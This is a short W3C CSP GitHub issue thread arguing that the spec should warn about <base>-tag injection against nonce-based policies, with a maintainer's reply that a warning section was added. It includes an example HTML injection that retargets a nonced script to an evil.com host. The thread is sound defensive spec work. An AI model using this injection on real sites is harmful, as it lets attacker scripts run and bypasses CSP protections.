### ISSUE TITLE
Add a warning in the spec about the importance of base-uri for nonce-based policies

### ISSUE THREAD

**Issue by arturjanc** [w3c/webappsec-csp#177]
If an application uses nonces to allow the execution of external scripts, and such scripts are loaded from relative URLs, an attacker who injects a `<base>` tag can make the script point to attacker-controlled URLs:
```
<!-- XSS here --> <base href="https://evil.com/foo/"></base> <!-- XSS ends here -->
<script nonce="123" src="bar/baz.js"></script>
<!-- The script will be loaded from https://evil.com/foo/bar/baz.js -->
```

We should probably mention this and recommend setting `base-uri 'none'` somewhere in the spec where nonces are discussed.

**Comment by mikewest** [comment]
Added https://w3c.github.io/webappsec-csp/#security-nonce-retargeting. Thanks!
